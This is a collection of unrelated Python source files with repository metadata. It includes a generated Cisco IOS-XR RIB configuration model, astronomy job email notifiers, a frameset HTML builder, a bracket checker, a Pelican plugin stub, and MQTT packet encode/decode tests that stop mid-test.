for Cisco IOS\-XR ip\-rib package configuration.
This module contains definitions
for the following management objects\:
rib\: RIB configuration.
This YANG module augments the
Cisco\-IOS\-XR\-infra\-rsi\-cfg
module with configuration data.
Copyright (c) 2013\-2016 by Cisco Systems, Inc.
All rights reserved.
"""
import re
import collections
from enum import Enum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk.errors import YPYError, YPYModelError
class Rib(object):
    """
    RIB configuration.

    .. attribute:: af

        RIB address family configuration
        **type**\: :py:class:`Af <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rib_cfg.Rib.Af>`

    .. attribute:: max_recursion_depth

        Set maximum depth for route recursion check
        **type**\: int

        **range:** 5..16

    """

    _prefix = 'ip-rib-cfg'
    _revision = '2015-11-09'

    def __init__(self):
        self.af = Rib.Af()
        self.af.parent = self
        self.max_recursion_depth = None


    class Af(object):
        """
        RIB address family configuration

        .. attribute:: ipv4

            IPv4 configuration
            **type**\: :py:class:`Ipv4 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rib_cfg.Rib.Af.Ipv4>`

        .. attribute:: ipv6

            IPv6 configuration
            **type**\: :py:class:`Ipv6 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rib_cfg.Rib.Af.Ipv6>`

        """

        _prefix = 'ip-rib-cfg'
        _revision = '2015-11-09'

        def __init__(self):
            self.parent = None
            self.ipv4 = Rib.Af.Ipv4()
            self.ipv4.parent = self
            self.ipv6 = Rib.Af.Ipv6()
            self.ipv6.parent = self


        class Ipv4(object):
            """
            IPv4 configuration

            .. attribute:: next_hop_dampening_disable

                Disable next\-hop dampening
                **type**\: :py:class:`Empty<ydk.types.Empty>`

            .. attribute:: redistribution_history

                Redistribution history related configs
                **type**\: :py:class:`RedistributionHistory <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rib_cfg.Rib.Af.Ipv4.RedistributionHistory>`

            """

            _prefix = 'ip-rib-cfg'
            _revision = '2015-11-09'

            def __init__(self):
                self.parent = None
                self.next_hop_dampening_disable = None
                self.redistribution_history = Rib.Af.Ipv4.RedistributionHistory()
                self.redistribution_history.parent = self


            class RedistributionHistory(object):
                """
                Redistribution history related configs

                .. attribute:: bcdl_client

                    Maximum BCDL redistribution history size
                    **type**\: int

                    **range:** 10..2000000

                .. attribute:: keep

                    Retain redistribution history after disconnect
                    **type**\: :py:class:`Keep <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rib_cfg.Rib.Af.Ipv4.RedistributionHistory.Keep>`

                .. attribute:: protocol_client

                    Maximum protocol redistribution history size
                    **type**\: int

                    **range:** 10..250000

                """

                _prefix = 'ip-rib-cfg'
                _revision = '2015-11-09'

                def __init__(self):
                    self.parent = None
                    self.bcdl_client = None
                    self.keep = Rib.Af.Ipv4.RedistributionHistory.Keep()
                    self.keep.parent = self
                    self.protocol_client = None


                class Keep(object):
                    """
                    Retain redistribution history after disconnect.

                    .. attribute:: bcdl

                        Enable retain BCDL history
                        **type**\: :py:class:`Empty<ydk.types.Empty>`

                    """

                    _prefix = 'ip-rib-cfg'
                    _revision = '2015-11-09'

                    def __init__(self):
                        self.parent = None
                        self.bcdl = None

                    @property
                    def _common_path(self):
                        return '/Cisco-IOS-XR-ip-rib-cfg:rib/Cisco-IOS-XR-ip-rib-cfg:af/Cisco-IOS-XR-ip-rib-cfg:ipv4/Cisco-IOS-XR-ip-rib-cfg:redistribution-history/Cisco-IOS-XR-ip-rib-cfg:keep'

                    def is_config(self):
                        ''' Returns True if this instance represents config data else returns False '''
                        return True

                    def _has_data(self):
                        if not self.is_config():
                            return False
                        if self.bcdl is not None:
                            return True
                        return False

                    @staticmethod
                    def _meta_info():
                        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rib_cfg as meta
                        return meta._meta_table['Rib.Af.Ipv4.RedistributionHistory.Keep']['meta_info']

                @property
                def _common_path(self):
                    return '/Cisco-IOS-XR-ip-rib-cfg:rib/Cisco-IOS-XR-ip-rib-cfg:af/Cisco-IOS-XR-ip-rib-cfg:ipv4/Cisco-IOS-XR-ip-rib-cfg:redistribution-history'

                def is_config(self):
                    ''' Returns True if this instance represents config data else returns False '''
                    return True

                def _has_data(self):
                    if not self.is_config():
                        return False
                    if self.bcdl_client is not None:
                        return True
                    if self.keep is not None and self.keep._has_data():
                        return True
                    if self.protocol_client is not None:
                        return True
                    return False

                @staticmethod
                def _meta_info():
                    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rib_cfg as meta
                    return meta._meta_table['Rib.Af.Ipv4.RedistributionHistory']['meta_info']

            @property
            def _common_path(self):
                return '/Cisco-IOS-XR-ip-rib-cfg:rib/Cisco-IOS-XR-ip-rib-cfg:af/Cisco-IOS-XR-ip-rib-cfg:ipv4'

            def is_config(self):
                ''' Returns True if this instance represents config data else returns False '''
                return True

            def _has_data(self):
                if not self.is_config():
                    return False
                if self.next_hop_dampening_disable is not None:
                    return True
                if self.redistribution_history is not None and self.redistribution_history._has_data():
                    return True
                return False

            @staticmethod
            def _meta_info():
                from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rib_cfg as meta
                return meta._meta_table['Rib.Af.Ipv4']['meta_info']


        class Ipv6(object):
            """
            IPv6 configuration

            .. attribute:: next_hop_dampening_disable

                Disable next\-hop dampening
                **type**\: :py:class:`Empty<ydk.types.Empty>`

            .. attribute:: redistribution_history

                Redistribution history related configs
                **type**\: :py:class:`RedistributionHistory <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rib_cfg.Rib.Af.Ipv6.RedistributionHistory>`

            """

            _prefix = 'ip-rib-cfg'
            _revision = '2015-11-09'

            def __init__(self):
                self.parent = None
                self.next_hop_dampening_disable = None
                self.redistribution_history = Rib.Af.Ipv6.RedistributionHistory()
                self.redistribution_history.parent = self


            class RedistributionHistory(object):
                """
                Redistribution history related configs

                .. attribute:: bcdl_client

                    Maximum BCDL redistribution history size
                    **type**\: int

                    **range:** 10..2000000

                .. attribute:: keep

                    Retain redistribution history after disconnect
                    **type**\: :py:class:`Keep <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rib_cfg.Rib.Af.Ipv6.RedistributionHistory.Keep>`

                .. attribute:: protocol_client

                    Maximum protocol redistribution history size
                    **type**\: int

                    **range:** 10..250000

                """

                _prefix = 'ip-rib-cfg'
                _revision = '2015-11-09'

                def __init__(self):
                    self.parent = None
                    self.bcdl_client = None
                    self.keep = Rib.Af.Ipv6.RedistributionHistory.Keep()
                    self.keep.parent = self
                    self.protocol_client = None


                class Keep(object):
                    """
                    Retain redistribution history after disconnect.

                    .. attribute:: bcdl

                        Enable retain BCDL history
                        **type**\: :py:class:`Empty<ydk.types.Empty>`

                    """

                    _prefix = 'ip-rib-cfg'
                    _revision = '2015-11-09'

                    def __init__(self):
                        self.parent = None
                        self.bcdl = None

                    @property
                    def _common_path(self):
                        return '/Cisco-IOS-XR-ip-rib-cfg:rib/Cisco-IOS-XR-ip-rib-cfg:af/Cisco-IOS-XR-ip-rib-cfg:ipv6/Cisco-IOS-XR-ip-rib-cfg:redistribution-history/Cisco-IOS-XR-ip-rib-cfg:keep'

                    def is_config(self):
                        ''' Returns True if this instance represents config data else returns False '''
                        return True

                    def _has_data(self):
                        if not self.is_config():
                            return False
                        if self.bcdl is not None:
                            return True
                        return False

                    @staticmethod
                    def _meta_info():
                        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rib_cfg as meta
                        return meta._meta_table['Rib.Af.Ipv6.RedistributionHistory.Keep']['meta_info']

                @property
                def _common_path(self):
                    return '/Cisco-IOS-XR-ip-rib-cfg:rib/Cisco-IOS-XR-ip-rib-cfg:af/Cisco-IOS-XR-ip-rib-cfg:ipv6/Cisco-IOS-XR-ip-rib-cfg:redistribution-history'

                def is_config(self):
                    ''' Returns True if this instance represents config data else returns False '''
                    return True

                def _has_data(self):
                    if not self.is_config():
                        return False
                    if self.bcdl_client is not None:
                        return True
                    if self.keep is not None and self.keep._has_data():
                        return True
                    if self.protocol_client is not None:
                        return True
                    return False

                @staticmethod
                def _meta_info():
                    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rib_cfg as meta
                    return meta._meta_table['Rib.Af.Ipv6.RedistributionHistory']['meta_info']

            @property
            def _common_path(self):
                return '/Cisco-IOS-XR-ip-rib-cfg:rib/Cisco-IOS-XR-ip-rib-cfg:af/Cisco-IOS-XR-ip-rib-cfg:ipv6'

            def is_config(self):
                ''' Returns True if this instance represents config data else returns False '''
                return True

            def _has_data(self):
                if not self.is_config():
                    return False
                if self.next_hop_dampening_disable is not None:
                    return True
                if self.redistribution_history is not None and self.redistribution_history._has_data():
                    return True
                return False

            @staticmethod
            def _meta_info():
                from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rib_cfg as meta
                return meta._meta_table['Rib.Af.Ipv6']['meta_info']

        @property
        def _common_path(self):
            return '/Cisco-IOS-XR-ip-rib-cfg:rib/Cisco-IOS-XR-ip-rib-cfg:af'

        def is_config(self):
            ''' Returns True if this instance represents config data else returns False '''
            return True

        def _has_data(self):
            if not self.is_config():
                return False
            if self.ipv4 is not None and self.ipv4._has_data():
                return True
            if self.ipv6 is not None and self.ipv6._has_data():
                return True
            return False

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rib_cfg as meta
            return meta._meta_table['Rib.Af']['meta_info']

    @property
    def _common_path(self):
        return '/Cisco-IOS-XR-ip-rib-cfg:rib'

    def is_config(self):
        ''' Returns True if this instance represents config data else returns False '''
        return True

    def _has_data(self):
        if not self.is_config():
            return False
        if self.af is not None and self.af._has_data():
            return True
        if self.max_recursion_depth is not None:
            return True
        return False

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rib_cfg as meta
        return meta._meta_table['Rib']['meta_info']
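The generated classes above all follow one recursive convention: a container's `_has_data()` returns True when any of its own leaves is set or when any child container has data. A tiny stand-alone sketch of that pattern (illustrative only, not the real YDK API):

```python
class ConfigNode:
    """Minimal stand-in for a generated container class."""
    def __init__(self, **children):
        self.leaf = None          # one illustrative leaf value
        self.children = children  # child containers keyed by name

    def _has_data(self):
        # A node has data when its own leaf is set...
        if self.leaf is not None:
            return True
        # ...or when any child container recursively has data.
        return any(child._has_data() for child in self.children.values())
```

Setting a leaf deep in the tree (e.g. `Keep.bcdl`) thus makes every ancestor report data, which is how a top-level call like `Rib._has_data()` decides whether any configuration needs to be encoded at all.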
0157da3a7107d40f8bb243b0513f8c4cd7c72bce | 4,623 | py | Python | core_admin/des/ccd/notify.py | linea-it/tno | f973381280504ceb1b606b5b3ccc79b6b8c2aa4f | [
"MIT"
] | null | null | null | core_admin/des/ccd/notify.py | linea-it/tno | f973381280504ceb1b606b5b3ccc79b6b8c2aa4f | [
"MIT"
] | 112 | 2018-04-24T19:10:55.000Z | 2022-02-26T16:55:02.000Z | core_admin/des/ccd/notify.py | linea-it/tno | f973381280504ceb1b606b5b3ccc79b6b8c2aa4f | [
"MIT"
] | null | null | null |
import logging
import traceback
import humanize
from common.notify import Notify
from des.dao import DownloadCcdJobDao
logger = logging.getLogger('download_ccds')
def notify_start_job(job_id):
    try:
        db = DownloadCcdJobDao(pool=False)
        # Fetch the job model by its ID
        job = db.get_by_id(job_id)
        user = db.get_user(job['owner_id'])
        context = dict({
            "username": user['username'],
            "job_id": job['id'],
            "start": job['date_initial'],
            "end": job['date_final'],
            "dynclass": job['dynclass'],
            "nights": job['nights'],
            "asteroids": job['asteroids'],
            "ccds_to_download": job['ccds_to_download'],
            "estimated_execution_time": str(job['estimated_execution_time']).split('.')[0],
            "estimated_t_size": humanize.naturalsize(int(job['estimated_t_size'])),
        })
        Notify().send_html_email(
            subject="Download DES CCDs Job %s Started" % job_id,
            to=user['email'],
            template="notification_download_ccd_start.html",
            context=context)
        logger.info("Sending start email to the user")
    except Exception as e:
        trace = traceback.format_exc()
        logger.error(trace)
        logger.error(e)


def notify_fail_job(job_id):
    try:
        db = DownloadCcdJobDao(pool=False)
        # Fetch the job model by its ID
        job = db.get_by_id(job_id)
        user = db.get_user(job['owner_id'])
        context = dict({
            "username": user['username'],
            "job_id": job['id'],
            "job_start": job['start'].strftime("%Y-%m-%d %H:%M:%S"),
            "job_end": job['finish'].strftime("%Y-%m-%d %H:%M:%S"),
            "execution_time": str(job['execution_time']).split(".")[0],
        })
        Notify().send_html_email(
            subject="Download DES CCDs Job %s Failed" % job_id,
            to=user['email'],
            template="notification_download_ccd_fail.html",
            context=context)
        logger.info("Sending Fail email to the user")
    except Exception as e:
        trace = traceback.format_exc()
        logger.error(trace)
        logger.error(e)


def notify_finish_job(job_id):
    try:
        db = DownloadCcdJobDao(pool=False)
        # Fetch the job model by its ID
        job = db.get_by_id(job_id)
        user = db.get_user(job['owner_id'])
        context = dict({
            "username": user['username'],
            "job_id": job['id'],
            "start": job['date_initial'],
            "end": job['date_final'],
            "job_start": job['start'].strftime("%Y-%m-%d %H:%M:%S"),
            "job_end": job['finish'].strftime("%Y-%m-%d %H:%M:%S"),
            "dynclass": job['dynclass'],
            "nights": job['nights'],
            "asteroids": job['asteroids'],
            "ccds_to_download": job['ccds_to_download'],
            "ccds_downloaded": job['ccds_downloaded'],
            "estimated_execution_time": str(job['estimated_execution_time']).split('.')[0],
            "execution_time": str(job['execution_time']).split('.')[0],
            "estimated_t_size": humanize.naturalsize(int(job['estimated_t_size'])),
            "t_size_downloaded": humanize.naturalsize(int(job['t_size_downloaded'])),
        })
        Notify().send_html_email(
            subject="Download DES CCDs Job %s Finished" % job_id,
            to=user['email'],
            template="notification_download_ccd_finish.html",
            context=context)
        logger.info("Sending Finish email to the user")
    except Exception as e:
        trace = traceback.format_exc()
        logger.error(trace)
        logger.error(e)


def notify_abort_job(job_id):
    try:
        db = DownloadCcdJobDao(pool=False)
        # Fetch the job model by its ID
        job = db.get_by_id(job_id)
        user = db.get_user(job['owner_id'])
        context = dict({
            "username": user['username'],
            "job_id": job['id'],
            "job_start": job['start'].strftime("%Y-%m-%d %H:%M:%S"),
            "job_end": job['finish'].strftime("%Y-%m-%d %H:%M:%S"),
            "execution_time": str(job['execution_time']).split(".")[0],
        })
        Notify().send_html_email(
            subject="Download DES CCDs Job %s Aborted" % job_id,
            to=user['email'],
            template="notification_download_ccd_abort.html",
            context=context)
        logger.info("Sending Abort email to the user")
    except Exception as e:
        trace = traceback.format_exc()
        logger.error(trace)
        logger.error(e)
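All four notifiers format durations with `str(...).split('.')[0]`. That idiom works because `str(timedelta)` renders as `H:MM:SS.microseconds`, so splitting on the dot drops the fractional seconds. A small sketch (the helper name is invented for illustration):

```python
from datetime import timedelta

def format_execution_time(delta):
    # str(timedelta) looks like '1:02:03.000500'; keep only the 'H:MM:SS' part.
    # When there are no microseconds there is no dot, and split() is a no-op.
    return str(delta).split('.')[0]
```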
6db01fd92286266f618e6ac3255e6aba8c49941f | 1,462 | py | Python | main/htmlmerge.py | opensource-projectteam16/Feed_Me_Server | 79739112c4e254fde047a5cd34e06394407adc2a | [
"MIT"
] | 2 | 2019-05-30T10:17:14.000Z | 2020-09-10T02:28:05.000Z | main/htmlmerge.py | opensource-projectteam16/Feed_Me_Server | 79739112c4e254fde047a5cd34e06394407adc2a | [
"MIT"
] | 21 | 2019-05-29T14:47:26.000Z | 2021-12-13T19:59:33.000Z | main/htmlmerge.py | opensource-projectteam16/Feed_Me_Server | 79739112c4e254fde047a5cd34e06394407adc2a | [
"MIT"
] | 7 | 2019-05-27T04:32:42.000Z | 2019-06-21T10:40:38.000Z | from bs4 import BeautifulSoup
def double_shape(filenumber, filename):
    fnum = "*"
    for i in range(filenumber - 1):
        if i % 2 == 1:
            fnum = fnum + ",*"
    fname = ""
    for i in range(len(filename)):
        if i % 2 == 0:
            fname = fname + "<frameset cols=*,*>"
        fname = fname + "<frame src=" + str(filename[i]) + ">"
        if i % 2 == 1:
            fname = fname + "</frameset>"
    print(fname)
    html_doc = "<html><frameset rows=" + fnum + ">" + fname + "</frameset>"
    q = BeautifulSoup(html_doc, 'html.parser')
    open('thing.html', "w").write(str(q))


def row_shape(filenumber, filename):
    fnum = "*"
    for i in range(filenumber - 1):
        if i % 2 == 1:
            fnum = fnum + ",*"
    fname = ""
    for i in range(len(filename)):
        fname = fname + "<frame src=" + str(filename[i]) + ">"
    print(fname)
    html_doc = "<html><frameset rows=" + fnum + ">" + fname + "</frameset>"
    q = BeautifulSoup(html_doc, 'html.parser')
    open('thing.html', "w").write(str(q))


def col_shape(filenumber, filename):
    fnum = "*"
    for i in range(filenumber - 1):
        if i % 2 == 1:
            fnum = fnum + ",*"
    fname = ""
    for i in range(len(filename)):
        fname = fname + "<frame src=" + str(filename[i]) + ">"
    print(fname)
    html_doc = "<html><frameset cols=" + fnum + ">" + fname + "</frameset>"
    q = BeautifulSoup(html_doc, 'html.parser')
    open('thing.html', "w").write(str(q))
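The three builders differ only in the frameset axis and whether frames are wrapped in nested pairs. The simple row/col case can be sketched as a side-effect-free function that returns the markup instead of printing it and writing `thing.html` (the helper name and signature are invented for illustration):

```python
def frameset_markup(filenames, axis="rows"):
    # One '*' plus one more for every second extra file, mirroring the
    # fnum loop in row_shape/col_shape above.
    stars = ",".join("*" for _ in range((len(filenames) + 1) // 2))
    frames = "".join("<frame src=%s>" % name for name in filenames)
    return "<html><frameset %s=%s>%s</frameset>" % (axis, stars, frames)
```

Returning the string makes the markup testable and leaves the choice of output file to the caller.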
09bd82df408552bd1587b6d12b3541580ad6125e | 739 | py | Python | STACK/check_Parenthesis using Stack.py | rajansh87/Algorithms-Implementations | 1f3dd1bc2decf10638fe0fdeeede47a650a9057b | [
"MIT"
] | 1 | 2020-05-10T19:01:51.000Z | 2020-05-10T19:01:51.000Z | STACK/check_Parenthesis using Stack.py | rajansh87/Algorithms-Implementations | 1f3dd1bc2decf10638fe0fdeeede47a650a9057b | [
"MIT"
] | 9 | 2021-03-17T18:10:18.000Z | 2021-03-29T19:35:06.000Z | STACK/check_Parenthesis using Stack.py | rajansh87/Data-Structures-and-Algorithms-Implementations | 0529079fbcd4d1a047210e9f2ff42c194c0818fe | [
"MIT"
] | null | null | null | s=")}}}(}]}(}}(}[]])](}"
stack=[]
for i in s:
    if i == "[" or i == "(" or i == "{":
        stack.append(i)
    elif i == "]":
        if len(stack) != 0:
            if stack[-1] == "[":
                stack.pop()
            else:
                print(0)
        else:
            print(0)
    elif i == ")":
        if len(stack) != 0:
            if stack[-1] == "(":
                stack.pop()
            else:
                print(0)
        else:
            print(0)
    elif i == "}":
        if len(stack) != 0:
            if stack[-1] == "{":
                stack.pop()
            else:
                print(0)
        else:
            print(0)
if len(stack) == 0:
    print(1)
else:
    print(0)
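The script above prints `0` for every mismatch as it scans and then prints a final verdict. The same stack idea reads more cleanly as a reusable function that returns a single boolean (a rewrite for illustration, not part of the original script):

```python
def is_balanced(s):
    """Return True when every closing bracket in s matches the most
    recent unmatched opener of the same kind."""
    pairs = {']': '[', ')': '(', '}': '{'}
    stack = []
    for ch in s:
        if ch in '([{':
            stack.append(ch)
        elif ch in pairs:
            # A close with no opener, or the wrong opener, fails immediately.
            if not stack or stack.pop() != pairs[ch]:
                return False
    # Any leftover openers mean the string is unbalanced.
    return not stack
```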
61dc56be89bcefd71aaffb502a65fabd588bed11 | 136 | py | Python | pelican/plugins/data_files/__init__.py | LucasVanHaaren/pelican-data-files | 0d7d2d87e04da76cd998e4c923ed23440bd55259 | [
"MIT"
] | null | null | null | pelican/plugins/data_files/__init__.py | LucasVanHaaren/pelican-data-files | 0d7d2d87e04da76cd998e4c923ed23440bd55259 | [
"MIT"
] | 5 | 2020-11-20T17:46:05.000Z | 2022-02-11T18:07:52.000Z | pelican/plugins/data_files/__init__.py | LucasVanHaaren/pelican-data-files | 0d7d2d87e04da76cd998e4c923ed23440bd55259 | [
"MIT"
] | 1 | 2021-08-19T02:10:05.000Z | 2021-08-19T02:10:05.000Z | from pelican import signals
from .generators import get_generators
def register():
    signals.get_generators.connect(get_generators)
11394298dd5fa548740ab12c17c120f24f7d99b3 | 20,218 | py | Python | mqtt/test/test_pdu.py | drewp/twisted-mqtt | 51828655052d5e51dc4e98fc4aed881f42e3e04f | [
"MIT"
] | 34 | 2015-10-03T20:08:19.000Z | 2022-01-31T23:51:02.000Z | mqtt/test/test_pdu.py | drewp/twisted-mqtt | 51828655052d5e51dc4e98fc4aed881f42e3e04f | [
"MIT"
] | 16 | 2016-04-23T18:46:42.000Z | 2020-08-24T07:33:01.000Z | mqtt/test/test_pdu.py | drewp/twisted-mqtt | 51828655052d5e51dc4e98fc4aed881f42e3e04f | [
"MIT"
] | 15 | 2015-12-12T03:35:55.000Z | 2021-07-08T05:39:19.000Z | # ----------------------------------------------------------------------
# Copyright (C) 2015 by Rafael Gonzalez
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# ----------------------------------------------------------------------
from twisted.trial import unittest
from twisted.test import proto_helpers

from mqtt import v31, v311
from mqtt.pdu import (
    CONNECT,
    CONNACK,
    DISCONNECT,
    PINGREQ,
    PINGRES,
    SUBSCRIBE,
    SUBACK,
    UNSUBSCRIBE,
    UNSUBACK,
    PUBLISH,
    PUBACK,
    PUBREC,
    PUBREL,
    PUBCOMP,
)


class PDUTestCase(unittest.TestCase):

    def test_CONNECT_encdec(self):
        request = CONNECT()
        response = CONNECT()
        request.clientId = "client-foo"
        request.version = v31
        request.keepalive = 0
        request.willTopic = None
        request.willMessage = None
        request.willQoS = None
        request.willRetain = None
        request.username = None
        request.password = None
        request.cleanStart = True
        response.decode(request.encode())
        self.assertEqual(request.encoded[0], response.encoded[0])
        self.assertEqual(request.version, response.version)
        self.assertEqual(request.clientId, response.clientId)
        self.assertEqual(request.keepalive, response.keepalive)
        self.assertEqual(request.willTopic, response.willTopic)
        self.assertEqual(request.willMessage, response.willMessage)
        self.assertEqual(request.willQoS, response.willQoS)
        self.assertEqual(request.willRetain, response.willRetain)
        self.assertEqual(request.username, response.username)
        self.assertEqual(request.password, response.password)
        self.assertEqual(request.cleanStart, response.cleanStart)

    def test_CONNECT_encdec_keepalive(self):
        request = CONNECT()
        response = CONNECT()
        request.version = v31
        request.clientId = "client-foo"
        request.keepalive = 12
        request.willTopic = None
        request.willMessage = None
        request.willQoS = None
        request.willRetain = None
        request.username = None
        request.password = None
        request.cleanStart = True
        response.decode(request.encode())
        self.assertEqual(request.encoded[0], response.encoded[0])
        self.assertEqual(request.version, response.version)
        self.assertEqual(request.clientId, response.clientId)
        self.assertEqual(request.keepalive, response.keepalive)
        self.assertEqual(request.willTopic, response.willTopic)
        self.assertEqual(request.willMessage, response.willMessage)
        self.assertEqual(request.willQoS, response.willQoS)
        self.assertEqual(request.willRetain, response.willRetain)
        self.assertEqual(request.username, response.username)
        self.assertEqual(request.password, response.password)
        self.assertEqual(request.cleanStart, response.cleanStart)

    def test_CONNECT_encdec_willTopic(self):
        request = CONNECT()
        response = CONNECT()
        request.clientId = "client-foo"
        request.keepalive = 1
        request.willTopic = "foo-topic"
        request.willMessage = ""
        request.willQoS = 1
        request.willRetain = False
        request.username = None
        request.password = None
        request.cleanStart = True
        request.version = v31
        response.decode(request.encode())
        self.assertEqual(request.encoded[0], response.encoded[0])
        self.assertEqual(request.version, response.version)
        self.assertEqual(request.clientId, response.clientId)
        self.assertEqual(request.keepalive, response.keepalive)
        self.assertEqual(request.willTopic, response.willTopic)
        self.assertEqual(request.willMessage, response.willMessage)
        self.assertEqual(request.willQoS, response.willQoS)
        self.assertEqual(request.willRetain, response.willRetain)
        self.assertEqual(request.username, response.username)
        self.assertEqual(request.password, response.password)
        self.assertEqual(request.cleanStart, response.cleanStart)

    def test_CONNECT_encdec_willMessage(self):
        request = CONNECT()
        response = CONNECT()
        request.clientId = "client-foo"
        request.keepalive = 1
        request.willTopic = "foo-topic"
        request.willMessage = "Hello World"
        request.willQoS = 2
        request.willRetain = False
        request.username = None
        request.password = None
        request.cleanStart = True
        request.version = v31
        response.decode(request.encode())
        self.assertEqual(request.encoded[0], response.encoded[0])
        self.assertEqual(request.version, response.version)
        self.assertEqual(request.clientId, response.clientId)
        self.assertEqual(request.keepalive, response.keepalive)
        self.assertEqual(request.willTopic, response.willTopic)
        self.assertEqual(request.willMessage, response.willMessage)
        self.assertEqual(request.willQoS, response.willQoS)
        self.assertEqual(request.willRetain, response.willRetain)
        self.assertEqual(request.username, response.username)
        self.assertEqual(request.password, response.password)
        self.assertEqual(request.cleanStart, response.cleanStart)

    def test_CONNECT_encdec_willRetain(self):
        request = CONNECT()
        response = CONNECT()
        request.clientId = "client-foo"
        request.keepalive = 1
        request.willTopic = "foo-topic"
        request.willMessage = "Hello World"
        request.willQoS = 2
        request.willRetain = True
        request.username = None
        request.password = None
        request.cleanStart = True
        request.version = v31
        response.decode(request.encode())
        self.assertEqual(request.encoded[0], response.encoded[0])
        self.assertEqual(request.version, response.version)
        self.assertEqual(request.clientId, response.clientId)
        self.assertEqual(request.keepalive, response.keepalive)
        self.assertEqual(request.willTopic, response.willTopic)
        self.assertEqual(request.willMessage, response.willMessage)
        self.assertEqual(request.willQoS, response.willQoS)
        self.assertEqual(request.willRetain, response.willRetain)
        self.assertEqual(request.username, response.username)
        self.assertEqual(request.password, response.password)
        self.assertEqual(request.cleanStart, response.cleanStart)

    def test_CONNECT_encdec_userpass(self):
        request = CONNECT()
        response = CONNECT()
        request.clientId = "client-foo"
        request.keepalive = 12000
        request.willTopic = "foo-topic"
        request.willMessage = ""
        request.willQoS = 0
        request.willRetain = False
        request.username = "foouser"
        request.password = "foopasswd"
        request.cleanStart = True
        request.version = v31
        response.decode(request.encode())
        self.assertEqual(request.encoded[0], response.encoded[0])
        self.assertEqual(request.version, response.version)
        self.assertEqual(request.clientId, response.clientId)
        self.assertEqual(request.keepalive, response.keepalive)
        self.assertEqual(request.willTopic, response.willTopic)
        self.assertEqual(request.willMessage, response.willMessage)
        self.assertEqual(request.willQoS, response.willQoS)
        self.assertEqual(request.willRetain, response.willRetain)
        self.assertEqual(request.username, response.username)
        self.assertEqual(request.password, response.password.decode(encoding='ascii', errors='ignore'))
        self.assertEqual(request.cleanStart, response.cleanStart)

    def test_CONNECT_encdec_session(self):
        request = CONNECT()
        response = CONNECT()
        request.clientId = "client-foo"
        request.keepalive = 1200
        request.willTopic = "foo-topic"
        request.willMessage = ""
        request.willQoS = 1
        request.willRetain = False
        request.username = None
        request.password = None
        request.cleanStart = False
        request.version = v31
        response.decode(request.encode())
        self.assertEqual(request.encoded[0], response.encoded[0])
        self.assertEqual(request.version, response.version)
        self.assertEqual(request.clientId, response.clientId)
        self.assertEqual(request.keepalive, response.keepalive)
        self.assertEqual(request.willTopic, response.willTopic)
        self.assertEqual(request.willMessage, response.willMessage)
        self.assertEqual(request.willQoS, response.willQoS)
        self.assertEqual(request.willRetain, response.willRetain)
        self.assertEqual(request.username, response.username)
        self.assertEqual(request.password, response.password)
        self.assertEqual(request.cleanStart, response.cleanStart)

    def test_CONNECT_encdec_version(self):
        request = CONNECT()
        response = CONNECT()
        request.clientId = "client-foo"
        request.keepalive = 120
        request.willTopic = "foo-topic"
        request.willMessage = ""
        request.willQoS = 0
        request.willRetain = False
        request.username = None
        request.password = None
        request.cleanStart = True
        request.version = v311
        response.decode(request.encode())
        self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.version, response.version)
self.assertEqual(request.clientId, response.clientId)
self.assertEqual(request.keepalive, response.keepalive)
self.assertEqual(request.willTopic, response.willTopic)
self.assertEqual(request.willMessage, response.willMessage)
self.assertEqual(request.willQoS, response.willQoS)
self.assertEqual(request.willRetain, response.willRetain)
self.assertEqual(request.username, response.username)
self.assertEqual(request.password, response.password)
self.assertEqual(request.cleanStart, response.cleanStart)
def test_PINGREQ_encdec(self):
request = PINGREQ()
response = PINGREQ()
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
def test_PINGRES_encdec(self):
request = PINGRES()
response = PINGRES()
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
def test_DISCONNECT_encdec(self):
request = DISCONNECT()
response = DISCONNECT()
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
def test_CONNACK_encdec(self):
request = CONNACK()
response = CONNACK()
request.session = True
request.resultCode = 2
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.session, response.session)
self.assertEqual(request.resultCode, response.resultCode)
def test_SUBSCRIBE_encdec(self):
request = SUBSCRIBE()
response = SUBSCRIBE()
request.topics = [('foo', 1), ('bar',0), ('baz',2)]
request.msgId = 5
response.decode(request.encode())
